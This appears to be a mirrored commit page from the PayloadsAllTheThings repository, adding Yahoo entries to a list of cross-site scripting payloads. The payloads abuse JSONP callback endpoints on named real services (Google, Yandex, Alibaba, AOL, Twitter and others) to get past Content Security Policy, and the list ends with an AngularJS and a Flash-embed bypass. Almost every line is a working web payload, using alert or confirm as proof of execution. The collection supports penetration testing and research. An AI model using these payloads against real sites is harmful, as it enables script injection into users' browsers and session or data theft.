mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-15 07:42:57 +00:00
aef5bb864a
Added 3 Yahoo JSONP endpoints:
* https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)
* https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)
* https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-
#Google.com:
"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
#Blogger.com:
"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
#Yandex:
"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
#VK.com:
"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
#Marketo.com:
"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
#AlibabaGroup:
"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
"><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>
"><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script>
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>
"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script>
"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
#Uber.com:
"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
#AOL/Yahoo:
"><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script>
"><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script>
"><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script>
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>
#Twitter.com:
"><script+src="http://search.twitter.com/trends.json?callback=alert()"></script>
"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script>
"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script>
#Others:
"><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script>
"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script>
"><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
"><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script>
"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
"><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>
"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
#GoogleAPIs:
"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>